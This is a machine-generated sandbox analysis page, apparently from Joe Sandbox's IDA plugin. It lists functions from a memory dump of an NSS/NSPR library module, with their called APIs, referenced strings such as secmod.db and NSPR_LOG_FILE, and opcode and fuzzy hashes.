Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: 931963e1e0c835f51ae2269ad60ce9c524e9daf2b3e547a249181ff41668bd7f
Instruction ID: e95d47b55e5a2e62ae16e2276de186a7b9a8fbd773193fc02ac58eda42ac1402
Opcode Fuzzy Hash: 931963e1e0c835f51ae2269ad60ce9c524e9daf2b3e547a249181ff41668bd7f
Instruction Fuzzy Hash: 5C515939F480798ADB16C67D8860FFFBBB19B83315F184329C5A167BE0C234454687D2

Function 6C56EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C56F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C56F0F9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 3ee688717b07d9cab97cbe028dc64a96dbe3b0e4af52b69ea9d5b850e3c58740
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 30919A75E0121A8BCB14CF69CC916AEB7F2BB85334F24472DD962A7B90D730A905CB91

Function 6C592F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C5B7929), ref: 6C592FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C5B7929), ref: 6C592FE0

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: e33c5d7e2b50d3853a2a21b7c1882b292068f81e612d9236ba37eb68fa62add7
Instruction ID: 4826ca51ff6f3339a781ccb8d1660cf613a5d43fa264322c6e68255393c2aa3f
Opcode Fuzzy Hash: e33c5d7e2b50d3853a2a21b7c1882b292068f81e612d9236ba37eb68fa62add7
Instruction Fuzzy Hash: 0651DF71A04991CFDB10CE59CC80B6A77B1FF85318F2945E9D90E9BB12D731E946CB81

Function 6C59ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C59EE3D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 525d63fed1d6a9e74672c7f7383f5f5146cfab1c95f2677bc6a33814cb95049d
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: D871D272E017418FD718CF59DC8066ABBF2FB88304F19466ED85A97B91D7B0E900CB90

Function 6C4C5F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C4C6013

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: a7375e359ee7713d38773c8d40667d8471eada4d1bba262d2c2255e527c81987
Instruction ID: 861e8153d241ede3ca3780ed3f22e75183f4044a19afde71332915a3675a0679
Opcode Fuzzy Hash: a7375e359ee7713d38773c8d40667d8471eada4d1bba262d2c2255e527c81987
Instruction Fuzzy Hash: 7CC1E278B046068BDB04CE1AC850FFEB7B2AF45319F64C128D9A5D7B61D731E842CB92

Function 6C655E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6C655B90: PR_Lock.NSS3(00010000,?,00000000,?,6C53DF9B), ref: 6C655B9E
Part of subcall function 6C655B90: PR_Unlock.NSS3 ref: 6C655BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C655E23,6C53E154), ref: 6C655EBF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: 996b9a7fbf23415fbf823e0781e6d90a25f222d4603b8d80340b97ae20527132
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: 9A519D72E0021A8FCB18CF59C8816AEF7B2FF98314B69456DD815B7745D730E951CBA0

Function 6C60DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c026dac20fcc07a1734ea868727a344da9f18d1accd0627406bddb7a877e80e3
Instruction ID: a612904c7e5e2919d710ae8f661f9c7798ba6590e7b77b6bdc6341726f30fdcd
Opcode Fuzzy Hash: c026dac20fcc07a1734ea868727a344da9f18d1accd0627406bddb7a877e80e3
Instruction Fuzzy Hash: 92F16B71B01215CFDB08CF19C580BAA77B2BF89318F298169D84AAB751DB31EC42CBD5

Function 6C5A1DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 4d279fd87d51d2ef47e1eb233c2d93db3185b3d7d5135646f6880565aff8df8f
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: 3CD149329046568BDB118E9ACC853DF7B63AB85328F1D4728CC681BBC6C37A9907C7D0

Function 6C538EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5183b471709e70bfc3289f6fdebeb3fe106b1e571972a0deb9e1c9909b533c5
Instruction ID: 50b565b5e4452f64d0d2a1dcd07cfb33ddf9b383f9d9f5b88e8c2a74a9ef7c66
Opcode Fuzzy Hash: d5183b471709e70bfc3289f6fdebeb3fe106b1e571972a0deb9e1c9909b533c5
Instruction Fuzzy Hash: 2011B272A002258BD708CF25DC84B5AB3A5BF81318F04566BD809CFA91E775E896C7D6

Function 6C610C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35242e4f029ce1f5df25b9697e51b7366d87242efd38dbdc9d358ab0f52886db
Instruction ID: 9096114b00ced320b6b6e660a24099460c3a7b973b55713f50658f36cbbf3977
Opcode Fuzzy Hash: 35242e4f029ce1f5df25b9697e51b7366d87242efd38dbdc9d358ab0f52886db
Instruction Fuzzy Hash: 1711E3787083459FCB00DF19C8C0AAA77B1FF85368F14816DD8198BB11DB71E816CBA5

Function 6C583FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: d71e97d6031fcbe1aed344edbef5e20bc47fcfa61f161e182e538895ba9296ec
Instruction ID: 0150d3f7d50e26dcfe009ec90ed030693cb9e36aca770db2a67c11c315e4e3ed
Opcode Fuzzy Hash: d71e97d6031fcbe1aed344edbef5e20bc47fcfa61f161e182e538895ba9296ec
Instruction Fuzzy Hash: 28F0B470A007599BCB00DF69C58019AB7F4EF49244F008119EC8AAB300DB30A9C4C7C5

Function 6C610D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 06b9f3cd4a5ddd5639a33f9928c90ecdc59e84f163cf6b2c79fab92d89d5e071
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: DFE06D3AA1A054A7DF148E0DC461AA97399DF8271AFA4807ACC599BE01D633F8138785

Function 6C53CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012f03b7884f1fa72a26369919a4d61274fa4bd84a4e81517108de8573d452e0
Instruction ID: 848b39e0d22c054fbc2e76f466894e9f6c9b97260d016d05093d8ae909a02bb4
Opcode Fuzzy Hash: 012f03b7884f1fa72a26369919a4d61274fa4bd84a4e81517108de8573d452e0
Instruction Fuzzy Hash: 4CC04838244608CFC704DF4AE8899A83BA8AB49610B040094EA028B721DB61F800DA84

Function 6C589840 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724065f025a8a62c0abb57206ca113dcf4ef3e1a894622a83be1941a0f4b2a12
Instruction ID: 47cd947f1165a56387d93d94cf911502ed9bfff6be2c9449f31cfe30de5b4f96
Opcode Fuzzy Hash: 724065f025a8a62c0abb57206ca113dcf4ef3e1a894622a83be1941a0f4b2a12
Instruction Fuzzy Hash:

Function 6C5A5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C5A5E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C5A5E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C5A5E5C
free.MOZGLUE(00000000), ref: 6C5A5E7E
free.MOZGLUE(00000000), ref: 6C5A5E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6C5A5EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C5A5EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C5A5ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C5A5EF0
free.MOZGLUE(00000000), ref: 6C5A5F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C5A5F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C5A5F5B
free.MOZGLUE(00000000), ref: 6C5A5F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C5A5FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C5A5FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C5A5FC4
free.MOZGLUE(00000000), ref: 6C5A5FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C5A5FE9
free.MOZGLUE(00000000), ref: 6C5A5FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C5A600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A6027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C5A605A
PR_smprintf.NSS3(6C67AAF9,00000000), ref: 6C5A606A
free.MOZGLUE(00000000), ref: 6C5A607C
free.MOZGLUE(00000000), ref: 6C5A609A
free.MOZGLUE(00000000), ref: 6C5A60B2
free.MOZGLUE(?), ref: 6C5A60CE

Strings

configDir=, xrefs: 6C5A5F9D
forceSecmodChoice, xrefs: 6C5A5F55
secmod.db, xrefs: 6C5A5EA0
readOnly, xrefs: 6C5A5E56
pkcs11.txt, xrefs: 6C5A5F47, 6C5A5F7C, 6C5A603A, 6C5A6053
noModDB, xrefs: 6C5A5EEA
secmod=, xrefs: 6C5A5FB1
flags, xrefs: 6C5A5E3A, 6C5A5EC6, 6C5A5F30
%s/%s, xrefs: 6C5A6055

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 1aef2980eced740558f3247ff179abfcaa00a2439813a323623f8e88d306e27e
Instruction ID: 2f8e90efcb3de9a9f984769bfce5b18ba84d7659d2df105d5816dc9f1463c8d8
Opcode Fuzzy Hash: 1aef2980eced740558f3247ff179abfcaa00a2439813a323623f8e88d306e27e
Instruction Fuzzy Hash: 5091EAF4A046019BEF118FB79C81B5E3BA4AF0A34CF480460ED5597B42EB31D956CBB6

Function 6C531D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C531DA3

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C531DB2

Part of subcall function 6C531240: TlsGetValue.KERNEL32(00000040,?,6C53116C,NSPR_LOG_MODULES), ref: 6C531267
Part of subcall function 6C531240: EnterCriticalSection.KERNEL32(?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C53127C
Part of subcall function 6C531240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C531291
Part of subcall function 6C531240: PR_Unlock.NSS3(?,?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C5312A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C531DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C531E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C531EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C531ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C531EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C531F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C531F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C531F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C531F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C531F83
PR_SetLogFile.NSS3(00000000), ref: 6C531FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C531FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C531FCB
free.MOZGLUE(00000000), ref: 6C531FD2

Strings

, %n, xrefs: 6C531E6B
timestamp, xrefs: 6C531EC4
NSPR_LOG_MODULES, xrefs: 6C531DAD
NSPR_LOG_FILE, xrefs: 6C531F69
Unable to create nspr log file '%s', xrefs: 6C531FB3
append, xrefs: 6C531EE6
sync, xrefs: 6C531E46
all, xrefs: 6C531F0E
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C531E27
bufsize, xrefs: 6C531E9B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 445da98ec69641060c3e5e3e620ce8ec7885b57389d09ca9cb1eea0278ce6c39
Instruction ID: 1e8ebc1b691cafe39a2bafc37ff37befa61e6d4cb15e4aa72c54c9e83e33af5b
Opcode Fuzzy Hash: 445da98ec69641060c3e5e3e620ce8ec7885b57389d09ca9cb1eea0278ce6c39
Instruction Fuzzy Hash: 7D515DB1E002299BDB00DFF5DD44A9F7BB8AF05308F181928E81ADB640F775D558CBA9

Function 6C616E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

